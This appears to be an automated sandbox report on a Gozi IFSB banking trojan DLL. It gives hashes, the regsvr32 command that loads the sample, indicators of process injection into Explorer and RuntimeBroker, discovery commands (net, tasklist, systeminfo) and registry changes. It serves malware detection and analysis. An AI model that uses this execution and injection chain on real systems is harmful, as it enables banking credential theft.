Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-tg7znsdhfn
Target aa856dedda137f7419ecc36766ed74e3
SHA256 9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f
Tags: gozi_ifsb 3000 banker trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256 9ec85fa9097826fce61020be2f15ed01c320109c7ec3654c2a42b1b5c46b4b6f

Threat Level: Known bad

The file aa856dedda137f7419ecc36766ed74e3 was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Modifies registry class

Runs net.exe

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Discovers systems in the same network

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2022-08-03 16:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted 2022-08-03 16:02
Reported 2022-08-03 16:05
Platform win7-20220715-en
Max time kernel 39s
Max time network 44s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1092 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
(identical row recorded 7 times in the original report)

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll

Network

N/A

Files

memory/2024-54-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp

memory/1092-55-0x0000000000000000-mapping.dmp

memory/1092-56-0x0000000075B81000-0x0000000075B83000-memory.dmp

memory/1092-57-0x0000000010000000-0x000000001000E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2022-08-03 16:02
Reported 2022-08-03 16:05
Platform win10v2004-20220721-en
Max time kernel 151s
Max time network 138s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4380 set thread context of 3116 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3116 set thread context of 3576 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 3828 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 4552 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3116 set thread context of 1740 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
(identical row recorded 3 times in the original report)

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = a3b25a8b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = b1abff8163a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\197bfdf98b90f1568047f539021597d317ed02a72fda0352cb78764413458770" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = 7fdf2f8263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = cf34488b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c0eb29be-1c77-40e1- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a49211c83afb11de1426666b7c241972cb34d99715d635879a6dcc7331aa299a" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f64f1dc4-a930-4385- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\37b82531-b0bf-420d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7704976f-8a79-45c7- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f26f38b6-a9b8-4163- = e41a908b63a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- = 5ae61e8263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cc7c23c5-8053-49d2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\e79f10a1-5129-43d7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\226f698dd5def1e53f14883a61dd2000a2581aee75765a4f31a9ac7d198c1474" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\29c2a255f2ef76869750647900b99eade8d34407b40cc49286f33a67e174c15b" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = 737e398263a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\f2d950e15b8c854979f1149b68f941ce5ac62d09f7cb83f94b648b3bcb2b9dd8" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bfc5aaf5-2e5b-480b- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8a87cb30-55b8-4a12- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = [binary data omitted] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2669fe67-5a16-4185- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8f628a72-0823-41d5- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\22030cd5-ea89-47c7- = 41edf18163a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\95da6e11-69b9-4234- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\14adeb20-9741-4f42- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fbfa43cf-0848-4c2f- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\335a8887-fb30-4439- C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
(identical row recorded 2 times in the original report)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
(identical row recorded 2 times in the original report)
N/A N/A C:\Windows\Explorer.EXE N/A
(identical row recorded 56 times in the original report)
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
